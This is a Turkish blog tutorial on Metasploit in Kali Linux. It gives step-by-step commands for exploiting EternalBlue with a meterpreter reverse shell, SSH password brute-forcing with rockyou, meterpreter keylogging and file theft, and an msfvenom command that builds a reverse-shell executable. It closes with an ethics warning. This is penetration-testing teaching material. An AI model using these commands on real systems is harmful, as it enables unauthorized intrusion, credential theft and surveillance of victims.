Kali Linux’ta Metasploit Framework ile Güvenlik Açığı Sömürüsü

bylightning 2 min read
0

 

Kali Linux’ta Metasploit Framework ile Güvenlik Açığı Sömürüsü

Giriş

Metasploit Framework, siber güvenlik dünyasında yaygın olarak kullanılan açık kaynaklı bir sömürü (exploitation) platformudur. Kali Linux, bu güçlü aracı varsayılan olarak sistemine dahil ederek, güvenlik uzmanlarına ve etik hackerlara kapsamlı test yetenekleri sunar. Metasploit sayesinde hedef sistemlerdeki güvenlik açıkları keşfedilebilir, istismar edilebilir ve sistem üzerinde test amaçlı denetimler gerçekleştirilebilir.

Bu yazıda, Metasploit’in ne olduğunu, Kali Linux’ta nasıl kullanılacağını, temel kavramları ve örnek bir sömürü senaryosunu adım adım inceleyeceğiz.

Metasploit Framework Nedir?

Metasploit, Rapid7 tarafından geliştirilen ve sürekli olarak güncellenen bir açık kaynak sömürü aracıdır. İçeriğinde binlerce:

  • Exploit (Sömürü)

  • Payload (Yük)

  • Encoder (Kodlayıcı)

  • Auxiliary (Yardımcı araçlar)

bulunur. Bu bileşenlerle gerçek saldırı vektörleri simüle edilebilir.

Metasploit şu amaçlarla kullanılır:

  • Güvenlik açıklarını keşfetme

  • Sızma testleri yapma

  • Eğitim ve laboratuvar ortamı hazırlama

  • Sisteme erişim sağlama (etik olarak)

Kali Linux’ta Metasploit Nasıl Çalıştırılır?

Kali Linux’ta Metasploit genellikle önceden kurulu gelir. Terminali açarak aşağıdaki komutu kullanarak başlatabilirsiniz:

bash

msfconsole

İlk çalıştırmada birkaç saniyelik modül yüklemesi yapılır ve sonra sizi interaktif bir terminal karşılar:

yaml

       =[ metasploit v6.x.x-dev ]
+ -- --=[ 2200 exploits - 1100 auxiliary - 300 payloads ]

Temel Metasploit Komutları

İlk etapta bilmeniz gereken bazı komutlar şunlardır:

  • search: Modül araması yapar.

    bash

    search type:exploit name:windows

  • use: Seçilen modülü aktif eder.

    bash

    use exploit/windows/smb/ms17_010_eternalblue

  • info: Modül hakkında bilgi verir.

  • set: Parametre ayarlamak için kullanılır.

    bash

    set RHOST 192.168.1.10
set LHOST 192.168.1.100

  • show options: Gerekli parametreleri gösterir.

  • run veya exploit: Modülü çalıştırır.

Exploit – Payload İlişkisi

Exploit, sistemdeki güvenlik açığını kullanan koddur. Payload ise exploit başarıya ulaştığında hedefe “yüklenen” zararlı yazılımdır. Genellikle amaç sistem üzerinde komut çalıştırmak veya ters bağlantı (reverse shell) almaktır.

Örnek Payload’lar:

  • windows/meterpreter/reverse_tcp

  • linux/x86/meterpreter/reverse_tcp

  • cmd/unix/reverse_bash

Payload seçimi:

bash

set PAYLOAD windows/meterpreter/reverse_tcp

Örnek Senaryo: EternalBlue (MS17-010) Exploit Kullanımı

Bu örnekte, Windows 7 hedef sistemde EternalBlue açığını sömüreceğiz.

  1. Metasploit’i Başlatın:

bash

msfconsole

  1. Exploit Modülünü Seçin:

bash

use exploit/windows/smb/ms17_010_eternalblue

  1. Payload Ayarla:

bash

set PAYLOAD windows/x64/meterpreter/reverse_tcp

  1. Hedef IP ve Saldırgan IP Gir:

bash

set RHOST 192.168.1.5
set LHOST 192.168.1.100

  1. İstismar Et:

bash

exploit

Eğer sömürü başarılı olursa Meterpreter oturumu başlar ve aşağıdaki gibi görünür:

bash

meterpreter >

Meterpreter ile Sistem Üzerinde Komutlar

Meterpreter, Metasploit'in gelişmiş yüklerinden biridir. Oturum açıldığında şu komutları kullanabilirsiniz:

  • sysinfo: Hedef sistem bilgisi

  • getuid: Hangi kullanıcıyla bağlandığını gösterir

  • shell: Hedef sistemde komut satırı açar

  • screenshot: Ekran görüntüsü alır

  • keyscan_start: Klavye kaydı başlatır

  • download: Dosya indirir

Auxiliary Modülleri Kullanma

Auxiliary modülleri, tarama, parola kırma, hizmet testi gibi yardımcı araçlardır.

Örneğin bir FTP tarayıcı:

bash

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.0/24
run

Ağ üzerindeki tüm FTP hizmetlerini listeler.

Metasploit ile Parola Kırma

Brute force modülleri ile SSH, FTP, MySQL gibi servislere parola saldırısı yapılabilir. Kali Linux’ta yer alan wordlist’lerle kullanılabilir:

bash

use auxiliary/scanner/ssh/ssh_login
set USER_FILE /usr/share/wordlists/usernames.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
set RHOSTS 192.168.1.5
run

MSFvenom ile Özel Payload Üretimi

Metasploit ile birlikte gelen msfvenom aracı, özel payload’lar üretmek için kullanılır.

Örneğin:

bash

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe

Bu komut ile çalışan bir .exe dosyası oluşturulur. Hedef çalıştırırsa ters bağlantı alınır.

Güvenlik ve Etik Kurallar

Metasploit gibi sömürü araçları yalnızca eğitim amaçlı ve izinli ortamlarda kullanılmalıdır. Gerçek sistemlere veya izinsiz ağlara saldırmak suçtur. Cezai yaptırımları vardır.

Kali Linux’un sanal bir laboratuvar ortamında kullanılması önerilir (örneğin: VirtualBox, VMware, veya Hack The Box gibi platformlar).

Sonuç

Metasploit, Kali Linux’un en güçlü saldırı ve test araçlarından biridir. Kullanımı teknik bilgi ve dikkat gerektirir. Etik hacking çalışmaları ve zafiyet analizleri için oldukça etkilidir. Sistematik şekilde modül kullanımı, payload yönetimi, hedef analizi ve sömürü işlemleriyle birlikte sistem güvenliği testleri profesyonelce yapılabilir.

Tags:
4.94 / 169 rates

Yorum Gönder

Daha yeni Daha eski